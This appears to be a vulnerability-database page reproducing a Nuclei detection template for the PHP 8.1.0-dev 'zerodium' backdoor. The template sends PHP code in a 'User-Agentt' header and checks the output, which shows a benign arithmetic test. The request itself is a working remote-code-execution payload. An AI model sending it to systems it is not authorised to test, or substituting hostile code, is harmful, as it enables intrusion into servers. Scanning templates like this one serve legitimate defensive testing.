php-zerodium-backdoor-rce: PHP 8.1.0-dev - Backdoor Remote Code Execution

漏洞描述

PHP 8.1.0-dev contains a backdoor dubbed 'zerodiumvar_dump' which can allow the execution of arbitrary PHP code.

PoC代码[已公开]

id: php-zerodium-backdoor-rce

info:
  name: PHP 8.1.0-dev - Backdoor Remote Code Execution
  author: dhiyaneshDk
  severity: critical
  description: |
    PHP 8.1.0-dev contains a backdoor dubbed 'zerodiumvar_dump' which can allow the execution of arbitrary PHP code.
  reference:
    - https://news-web.php.net/php.internals/113838
    - https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
    - https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 1
  tags: php,backdoor,rce,zerodium,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    headers:
      User-Agentt: zerodiumvar_dump(233333*333332);

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "int(77777355556)"
# digest: 490a0046304402202064b721de2e429e9c9d5d46f56552c6d3de6e5ebae32d827d5b9a720575d83c02202194dd6054b23b5c825a6c143ec79fd6013fd14a612b48c6b5c9bdcb76c11a9c:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/backdoor/php-zerodium-backdoor-rce.yaml